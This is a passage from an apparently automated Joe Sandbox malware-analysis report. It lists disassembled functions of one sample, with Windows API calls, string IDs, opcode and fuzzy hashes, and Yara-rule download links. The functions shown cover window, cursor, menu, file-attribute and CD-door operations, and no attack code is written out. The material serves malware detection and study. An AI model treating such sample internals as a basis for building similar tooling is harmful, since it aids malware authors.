                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                        • String ID: @$ThumbnailClass
                                                                                        • API String ID: 1788623398-1539354611
                                                                                        • Opcode ID: 669bc5d2a5c452374ee22981f9444d8d68a805a8765a871b1b4bd50104187170
                                                                                        • Instruction ID: 2113ca19c953e4d0fb0a3bed3b629d6a09082ecb25fab152276a3acc7fd757eb
                                                                                        • Opcode Fuzzy Hash: 669bc5d2a5c452374ee22981f9444d8d68a805a8765a871b1b4bd50104187170
                                                                                        • Instruction Fuzzy Hash: BD81CF711082059BDB00DF11C881BAB77E8EF4075AF14856FFD859A192DB38DD4DCBAA
                                                                                        Function 0048C5FE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                        • DragQueryPoint.SHELL32(?,?), ref: 0048C627
                                                                                          • Part of subcall function 0048AB37: ClientToScreen.USER32(?,?), ref: 0048AB60
                                                                                          • Part of subcall function 0048AB37: GetWindowRect.USER32(?,?), ref: 0048ABD6
                                                                                          • Part of subcall function 0048AB37: PtInRect.USER32(?,?,0048C014), ref: 0048ABE6
                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0048C690
                                                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0048C69B
                                                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0048C6BE
                                                                                        • _wcscat.LIBCMT ref: 0048C6EE
                                                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0048C705
                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0048C71E
                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0048C735
                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0048C757
                                                                                        • DragFinish.SHELL32(?), ref: 0048C75E
                                                                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0048C851
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pbL
                                                                                        • API String ID: 169749273-3863044002
                                                                                        • Opcode ID: fe787714386ed1c3ddd4163c3f5535821c598f5dfa6e15062804bbb5d4f1b538
                                                                                        • Instruction ID: 4fadb8ae9d86136d60326728fb0320be203031e120dd753c2ba31efb77555f42
                                                                                        • Opcode Fuzzy Hash: fe787714386ed1c3ddd4163c3f5535821c598f5dfa6e15062804bbb5d4f1b538
                                                                                        • Instruction Fuzzy Hash: 1B617F71108300AFC701EF65CC85D9FBBE8EF88714F50092EF591A22A1DB74A949CB6A
                                                                                        Function 0045ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: __wcsnicmp
                                                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                        • API String ID: 1038674560-1810252412
                                                                                        • Opcode ID: 52f89f39c4f5c5e735f1cd86a92d30baad3c4cbecdefe61fa6aede404be9d37c
                                                                                        • Instruction ID: cc55e2bc6580523fe6938d14c256d65c14dee3a36fa7a852f9c3cef8ae364549
                                                                                        • Opcode Fuzzy Hash: 52f89f39c4f5c5e735f1cd86a92d30baad3c4cbecdefe61fa6aede404be9d37c
                                                                                        • Instruction Fuzzy Hash: 2C31A370A48209AADB01EA61DE43FEE7774AF14719F60052FB801711D2EB6D6F18C56E
                                                                                        Function 00474FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 00475013
                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 0047501E
                                                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 00475029
                                                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 00475034
                                                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 0047503F
                                                                                        • LoadCursorW.USER32(00000000,00007F81), ref: 0047504A
                                                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 00475055
                                                                                        • LoadCursorW.USER32(00000000,00007F80), ref: 00475060
                                                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 0047506B
                                                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 00475076
                                                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 00475081
                                                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 0047508C
                                                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00475097
                                                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 004750A2
                                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 004750AD
                                                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 004750B8
                                                                                        • GetCursorInfo.USER32(?), ref: 004750C8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Cursor$Load$Info
                                                                                        • String ID:
                                                                                        • API String ID: 2577412497-0
                                                                                        • Opcode ID: fe88967af424c1f4c9ae994d1dca842c12f2ee5cef9159fe2d10a3b622c76547
                                                                                        • Instruction ID: d5c7a2001707235dd9e126089dd3671015cbda4ea0a9ffae781a460d29ca5a6d
                                                                                        • Opcode Fuzzy Hash: fe88967af424c1f4c9ae994d1dca842c12f2ee5cef9159fe2d10a3b622c76547
                                                                                        • Instruction Fuzzy Hash: 7F3114B1D083196ADF109FB68C8999FBFE8FF04750F50453BA50DEB281DA7865048F95
                                                                                        Function 0048A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 0048A259
                                                                                        • DestroyWindow.USER32(?,?), ref: 0048A2D3
                                                                                          • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0048A34D
                                                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0048A36F
                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A382
                                                                                        • DestroyWindow.USER32(00000000), ref: 0048A3A4
                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0048A3DB
                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A3F4
                                                                                        • GetDesktopWindow.USER32 ref: 0048A40D
                                                                                        • GetWindowRect.USER32(00000000), ref: 0048A414
                                                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0048A42C
                                                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0048A444
                                                                                          • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                        • String ID: 0$tooltips_class32
                                                                                        • API String ID: 1297703922-3619404913
                                                                                        • Opcode ID: ad7f984ea1cd4845daa69472354c2a8f15b860bce95c98789d10b07fca09f9c0
                                                                                        • Instruction ID: 021702ee8d535e162beb7c83f4b22bae82635ac61efe1e234d944cc96a30802f
                                                                                        • Opcode Fuzzy Hash: ad7f984ea1cd4845daa69472354c2a8f15b860bce95c98789d10b07fca09f9c0
                                                                                        • Instruction Fuzzy Hash: CE719270141204AFE721DF18CC49F6B77E5FB88704F04492EF985972A0D7B8E956CB6A
                                                                                        Function 00484392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00484424
                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0048446F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharMessageSendUpper
                                                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                        • API String ID: 3974292440-4258414348
                                                                                        • Opcode ID: 8551f69f223e5bdeac0c783f2c4a73df6d5f98841a83c573d89b7fb24d6da8d4
                                                                                        • Instruction ID: 284482c989e2c3ea33895925bad2fd62e2b6eb619b8524f2c72ddc2562c3458e
                                                                                        • Opcode Fuzzy Hash: 8551f69f223e5bdeac0c783f2c4a73df6d5f98841a83c573d89b7fb24d6da8d4
                                                                                        • Instruction Fuzzy Hash: BF917F712043119BCB04FF11C451A6EB7E1AF95358F44886EF8966B3A3DB38ED0ACB59
                                                                                        Function 0048B7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0048B8B4
                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,004891C2), ref: 0048B910
                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0048B949
                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0048B98C
                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0048B9C3
                                                                                        • FreeLibrary.KERNEL32(?), ref: 0048B9CF
                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0048B9DF
                                                                                        • DestroyIcon.USER32(?,?,?,?,?,004891C2), ref: 0048B9EE
                                                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0048BA0B
                                                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0048BA17
                                                                                          • Part of subcall function 00422EFD: __wcsicmp_l.LIBCMT ref: 00422F86
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                        • String ID: .dll$.exe$.icl
                                                                                        • API String ID: 1212759294-1154884017
                                                                                        • Opcode ID: 2fc131844969b4b5c283f9404ec8a9d49153947123385b136b1911b68efed916
                                                                                        • Instruction ID: 50163288b7a3e5e0cbad55d9f7afdff750af503695f4b02481751edd59ee4b0a
                                                                                        • Opcode Fuzzy Hash: 2fc131844969b4b5c283f9404ec8a9d49153947123385b136b1911b68efed916
                                                                                        • Instruction Fuzzy Hash: CC61F2B1900215BEEB14EF65DC41FBF7BA8FB08710F10491AF915D62C1DBB8A984DBA4
                                                                                        Function 0046A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                          • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                        • CharLowerBuffW.USER32(?,?), ref: 0046A3CB
                                                                                        • GetDriveTypeW.KERNEL32 ref: 0046A418
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A460
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A497
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A4C5
                                                                                          • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                        • API String ID: 2698844021-4113822522
                                                                                        • Opcode ID: c9c3f5bcbb85441f6b74d870dff76a731b9fa90bff3ae6885b825ce50aabd4a2
                                                                                        • Instruction ID: 3713139b98a23bb0435d921a878e050fdb512fde8566727adc807e41ed5eba46
                                                                                        • Opcode Fuzzy Hash: c9c3f5bcbb85441f6b74d870dff76a731b9fa90bff3ae6885b825ce50aabd4a2
                                                                                        • Instruction Fuzzy Hash: F7515EB15146049FC700EF11C88196BB7E8EF94718F10886EF89967292DB39ED0ACF5A
                                                                                        Function 0045F8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0043E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0045F8DF
                                                                                        • LoadStringW.USER32(00000000,?,0043E029,00000001), ref: 0045F8E8
                                                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,0043E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0045F90A
                                                                                        • LoadStringW.USER32(00000000,?,0043E029,00000001), ref: 0045F90D
                                                                                        • __swprintf.LIBCMT ref: 0045F95D
                                                                                        • __swprintf.LIBCMT ref: 0045F96E
                                                                                        • _wprintf.LIBCMT ref: 0045FA17
                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045FA2E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                        • API String ID: 984253442-2268648507
                                                                                        • Opcode ID: d323a42eacfa577a06e4697a5b07522abff3b97fa892fa224b21e0072cf2805f
                                                                                        • Instruction ID: b677be3246c54b3b75aebbff2f5f4dd64b3be6ce846d7ca24f480393c6b0c58e
                                                                                        • Opcode Fuzzy Hash: d323a42eacfa577a06e4697a5b07522abff3b97fa892fa224b21e0072cf2805f
                                                                                        • Instruction Fuzzy Hash: 92412072D04119AACF04FBE1DD46EEE7778AF14309F50047AB50576092EA396F09CB6A
                                                                                        Function 0046D899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __wsplitpath.LIBCMT ref: 0046DA10
                                                                                        • _wcscat.LIBCMT ref: 0046DA28
                                                                                        • _wcscat.LIBCMT ref: 0046DA3A
                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0046DA4F
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0046DA63
                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 0046DA7B
                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 0046DA95
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0046DAA7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                        • String ID: *.*
                                                                                        • API String ID: 34673085-438819550
                                                                                        • Opcode ID: fa1f45a871fde2c366193a2ba591cd779a7d7abb513180d0bc3df0c630a8fc5b
                                                                                        • Instruction ID: 3a96bfa05d70ac0d448354448300b44f57ebebe42a7fb519914baabb83a09890
                                                                                        • Opcode Fuzzy Hash: fa1f45a871fde2c366193a2ba591cd779a7d7abb513180d0bc3df0c630a8fc5b
                                                                                        • Instruction Fuzzy Hash: 128182B1E042419FCB24EF65C84496BB7E4AF89314F18882FF889D7351E638D949CB57
                                                                                        Function 0048C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0048C1FC
                                                                                        • GetFocus.USER32 ref: 0048C20C
                                                                                        • GetDlgCtrlID.USER32(00000000), ref: 0048C217
                                                                                        • _memset.LIBCMT ref: 0048C342
                                                                                        • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0048C36D
                                                                                        • GetMenuItemCount.USER32(?), ref: 0048C38D
                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 0048C3A0
                                                                                        • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0048C3D4
                                                                                        • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0048C41C
                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0048C454
                                                                                        • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0048C489
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 1296962147-4108050209
                                                                                        • Opcode ID: ff1e67c3f7e68d65cd902f598cf91c9ffe482aa318859ae485ca0e10334a8edb
                                                                                        • Instruction ID: c475bcefc4ba02209658d373736a3052ec3262963195f5d7aee57ef1aaf8ece4
                                                                                        • Opcode Fuzzy Hash: ff1e67c3f7e68d65cd902f598cf91c9ffe482aa318859ae485ca0e10334a8edb
                                                                                        • Instruction Fuzzy Hash: 17818870608301AFD710EF24D894A7FBBE8EB88714F004D2EF99597291D778D945CBAA
                                                                                        Function 0047731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 0047738F
                                                                                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0047739B
                                                                                        • CreateCompatibleDC.GDI32(?), ref: 004773A7
                                                                                        • SelectObject.GDI32(00000000,?), ref: 004773B4
